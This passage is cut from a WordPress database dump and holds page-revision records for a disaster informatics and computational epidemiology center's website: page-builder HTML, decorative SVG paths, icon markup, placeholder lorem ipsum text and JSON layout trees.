d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',22,'https://gsudice.dataconn.net/?p=332',0,'revision','',0),(336,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',168,'https://gsudice.dataconn.net/?p=336',0,'revision','',0),(337,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',20,'https://gsudice.dataconn.net/?p=337',0,'revision','',0),(338,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 